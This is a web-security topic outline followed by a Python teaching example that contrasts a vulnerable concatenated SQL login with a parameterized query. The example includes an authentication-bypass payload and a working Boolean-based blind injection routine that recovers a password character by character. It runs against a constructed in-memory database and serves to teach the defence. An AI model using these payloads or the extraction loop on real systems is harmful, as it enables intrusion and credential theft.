Web Security and Privacy

  1. Server-Side Vulnerabilities
    1. Injection Attacks
      1. SQL Injection
        1. In-band SQLi
        2. Blind SQLi
          1. Boolean-based
          2. Time-based
        3. Out-of-band SQLi
        4. Mitigation Strategies
          1. Parameterized Queries
          2. Prepared Statements
          3. Use of ORMs
      2. NoSQL Injection
        1. Common NoSQL Databases
        2. Injection Techniques
        3. Mitigation Strategies
      3. OS Command Injection
        1. Command Execution Vulnerabilities
        2. Prevention Techniques
      4. LDAP Injection
        1. LDAP Query Manipulation
        2. Mitigation Strategies
    2. Broken Authentication and Session Management
      1. Credential Stuffing
        1. Automated Attacks
        2. Prevention Techniques
      2. Brute-Force Attacks
        1. Rate Limiting
        2. Account Lockout Policies
        3. CAPTCHA Implementation
      3. Session Fixation
        1. Attack Mechanism
        2. Prevention Strategies
      4. Insecure Session ID Handling
        1. Predictable Session IDs
        2. Secure Session Storage
    3. Missing Function Level Access Control
      1. Privilege Escalation Risks
      2. Access Control Enforcement
    4. Insecure Deserialization
      1. Serialization Formats
      2. Exploitation Techniques
      3. Prevention Strategies
    5. Server-Side Request Forgery
      1. Internal Network Access
      2. Data Exfiltration
      3. Mitigation Techniques
    6. File Handling Vulnerabilities
      1. Unrestricted File Upload
        1. File Type Validation
        2. Storage Location Controls
      2. Path Traversal
        1. Directory Structure Disclosure
        2. Prevention Techniques
      3. Local File Inclusion
        1. Exploitation Methods
        2. Mitigation Strategies
      4. Remote File Inclusion
        1. Remote Code Execution
        2. Prevention Techniques
    7. XML External Entity Injection
      1. XML Parser Vulnerabilities
      2. Impact of XXE Attacks
      3. Secure XML Parsing
    8. Security Misconfiguration
      1. Default Credentials
        1. Risks and Remediation
      2. Verbose Error Messages
        1. Information Disclosure
        2. Error Handling Best Practices
      3. Unpatched Systems
        1. Patch Management
        2. Vulnerability Scanning
      4. Insecure Service Configurations
        1. Disabling Unused Services
        2. Secure Defaults
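The SQL Injection branch of the outline above (in-band SQLi, Boolean-based blind SQLi, and the parameterized-query / prepared-statement mitigations) is illustrated by the following added example. It is not part of the original outline: the `users` table, the accounts `alice` and `bob`, the passwords, and every function name are constructed for this demonstration. It uses Python's built-in `sqlite3` module with an in-memory database, so it runs offline. One string-concatenated login query is shown beside its parameterized counterpart; the same payloads bypass the first and are treated as literal data by the second. A Boolean-based blind extraction routine then recovers a password one character at a time through the vulnerable query, using only the application's "found / not found" response.

```python
"""SQL injection: vulnerable concatenation vs. a parameterized query,
plus a Boolean-based blind extraction against the vulnerable version.
Added example; all schema, data and names are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a throwaway in-memory database with a constructed users table.
    Plaintext passwords are used only so the blind probe has something to read;
    real systems store salted password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """In-band SQLi: attacker-controlled text is spliced into the statement,
    so quotes and comment markers in the input change the query's structure."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """Prepared statement with bound parameters: the driver sends the query
    text and the values separately, so input can only ever be data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def blind_probe(conn: sqlite3.Connection, target_user: str, condition: str) -> bool:
    """Boolean-based blind SQLi: the application only reveals whether a row
    matched, so the attacker appends an arbitrary SQL condition and reads the
    answer from that single bit. The trailing '--' comments out the rest of
    the original WHERE clause."""
    payload = target_user + "' AND " + condition + " --"
    return login_vulnerable(conn, payload, "x") is not None


def blind_extract_password(
    conn: sqlite3.Connection,
    target_user: str,
    alphabet: str = "abcdefghijklmnopqrstuvwxyz0123456789",
    max_len: int = 16,
) -> str:
    """Recover the target's password one character per position by asking
    yes/no questions through blind_probe. Stops at the first position where
    no alphabet character matches (end of string or character outside alphabet)."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            condition = (
                "(SELECT substr(password,%d,1) FROM users WHERE username='%s')='%s'"
                % (pos, target_user, ch)
            )
            if blind_probe(conn, target_user, condition):
                recovered += ch
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    db = make_db()
    # Authentication bypass: the comment marker discards the password check.
    print("vulnerable, bypass   :", login_vulnerable(db, "alice' --", "wrong"))
    print("parameterized, bypass:", login_parameterized(db, "alice' --", "wrong"))
    # Blind extraction through the vulnerable endpoint only.
    print("blind extraction     :", blind_extract_password(db, "alice"))
```

The blind extraction issues roughly `len(alphabet)` queries per character and needs no error messages or query output at all, which is why a "not found" page is not a sufficient defence; the only fix in this example is the parameterized form, against which the same payloads return nothing. Time-based blind SQLi follows the same pattern with a delay function in place of the match/no-match signal (SQLite has no sleep primitive, so it is not shown here).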